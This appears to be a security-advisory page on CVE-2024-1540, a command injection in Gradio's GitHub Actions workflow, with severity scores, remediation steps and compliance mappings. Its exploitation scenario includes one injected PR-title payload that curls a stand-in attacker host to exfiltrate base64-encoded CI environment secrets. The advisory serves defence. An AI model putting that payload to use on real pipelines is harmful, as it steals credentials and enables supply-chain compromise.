CVE-2024-1540: Gradio CI/CD command injection enables

CISO Take

If your ML team uses Gradio or has forked its CI/CD workflows, your GitHub Actions secrets—cloud credentials, API keys, tokens—may be exposed to any external contributor who can open a pull request. Patch immediately by reviewing all workflow files for direct `${{ }}` interpolation in `run` steps and moving untrusted inputs to intermediate environment variables. Rotate any secrets stored in affected CI environments as a precaution.

What is the risk?

High risk (CVSS 8.2) with low attack complexity and no authentication required—any external contributor can trigger this via a crafted PR. Gradio is one of the most widely deployed ML demo and prototype frameworks in the AI ecosystem, meaning the blast radius extends across research labs, startups, and enterprise ML teams. The primary concern is not the Gradio framework code itself but the CI/CD pipeline pattern, which many teams have copied or adapted. Secrets exfiltration is a silent, high-value outcome that may go undetected for weeks.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
Gradio	pip	—	No patch
43.0K OpenSSF 5.6 685 dependents Pushed 4d ago 26% patched ~110d to patch Full package profile →

Do you use Gradio? You're affected.

How severe is it?

CVSS 3.1

8.2 / 10

EPSS

2.0%

chance of exploitation in 30 days

Higher than 78% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV Network

AC Low

PR None

UI None

S Unchanged

C High

I Low

A None

What should I do?

6 steps

Apply the patch from commit d56bb28 immediately if running self-hosted or forked Gradio workflows.
Audit ALL GitHub Actions workflow files for run steps containing ${{ github.event.* }} or any untrusted context expression—this pattern is the root cause.
Refactor by assigning untrusted inputs to environment variables first (e.g., ENV_VAR: ${{ github.event.pull_request.title }}) before referencing them in shell commands.
Rotate all GitHub Actions secrets (GITHUB_TOKEN scopes, cloud credentials, API keys) as a precaution.
Enable GitHub's 'Require approval for all outside collaborators' workflow setting to gate execution on untrusted PRs.
Use CodeQL or Semgrep with the GitHub Actions ruleset to detect similar injection patterns across all repos.

What does CISA's SSVC say?

Decision Track*

Exploitation poc

Automatable Yes

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Supply Chain Framework AML.T0010.001 - AI Software AML.T0025 - Exfiltration via Cyber Means AML.T0050 - Command and Scripting Interpreter AML.T0055 - Unsecured Credentials

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, Robustness and Cybersecurity

ISO 42001

A.10.2 - AI Supplier Relationships A.5.5 - AI System Security

NIST AI RMF

GOVERN 1.4 - Organizational Teams and Responsibilities MANAGE 2.4 - Mechanisms for Incident Response

OWASP LLM Top 10

LLM05:2025 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2024-1540?

If your ML team uses Gradio or has forked its CI/CD workflows, your GitHub Actions secrets—cloud credentials, API keys, tokens—may be exposed to any external contributor who can open a pull request. Patch immediately by reviewing all workflow files for direct `${{ }}` interpolation in `run` steps and moving untrusted inputs to intermediate environment variables. Rotate any secrets stored in affected CI environments as a precaution.

Is CVE-2024-1540 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-1540, increasing the risk of exploitation.

How to fix CVE-2024-1540?

1. Apply the patch from commit d56bb28 immediately if running self-hosted or forked Gradio workflows. 2. Audit ALL GitHub Actions workflow files for `run` steps containing `${{ github.event.* }}` or any untrusted context expression—this pattern is the root cause. 3. Refactor by assigning untrusted inputs to environment variables first (e.g., `ENV_VAR: ${{ github.event.pull_request.title }}`) before referencing them in shell commands. 4. Rotate all GitHub Actions secrets (GITHUB_TOKEN scopes, cloud credentials, API keys) as a precaution. 5. Enable GitHub's 'Require approval for all outside collaborators' workflow setting to gate execution on untrusted PRs. 6. Use CodeQL or Semgrep with the GitHub Actions ruleset to detect similar injection patterns across all repos.

What systems are affected by CVE-2024-1540?

This vulnerability affects the following AI/ML architecture patterns: ML deployment pipelines, CI/CD workflows, Model training pipelines, Model serving infrastructure.

What is the CVSS score for CVE-2024-1540?

CVE-2024-1540 has a CVSS v3.1 base score of 8.2 (HIGH). The EPSS exploitation probability is 1.98%.

What is the AI security impact?

Affected AI Architectures

ML deployment pipelinesCI/CD workflowsModel training pipelinesModel serving infrastructure

MITRE ATLAS Techniques

AML.T0010.001 AI Software

AML.T0025 Exfiltration via Cyber Means

AML.T0050 Command and Scripting Interpreter

AML.T0055 Unsecured Credentials

Compliance Controls Affected

EU AI Act: Article 15

ISO 42001: A.10.2, A.5.5

NIST AI RMF: GOVERN 1.4, MANAGE 2.4

OWASP LLM Top 10: LLM05:2025

What are the technical details?

Original Advisory

A command injection vulnerability exists in the deploy+test-visual.yml workflow of the gradio-app/gradio repository, due to improper neutralization of special elements used in a command. This vulnerability allows attackers to execute unauthorized commands, potentially leading to unauthorized modification of the base repository or secrets exfiltration. The issue arises from the unsafe handling of GitHub context information within a `run` operation, where expressions inside `${{ }}` are evaluated and substituted before script execution. Remediation involves setting untrusted input values to intermediate environment variables to prevent direct influence on script generation.

Exploitation Scenario

An adversary forks the Gradio repository or submits a pull request with a crafted PR title or branch name containing shell metacharacters—e.g., `'; curl https://attacker.com/exfil?t=$(cat /proc/self/environ | base64) #`. When the `deploy+test-visual.yml` workflow runs, it interpolates the GitHub context expression directly into a shell `run` step. The injected command executes in the CI runner, exfiltrating the `GITHUB_TOKEN`, any stored cloud provider credentials, and API keys. The attacker can use the `GITHUB_TOKEN` to push malicious commits, tamper with releases, or inject backdoored model artifacts into the deployment pipeline—all without ever having write access to the repository.

Weaknesses (CWE)

CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')

CWE-77 — Improper Neutralization of Special Elements used in a Command ('Command Injection'): The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.

[Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
[Implementation] If possible, ensure that all external commands called from the program are statically created.

Source: MITRE CWE corpus.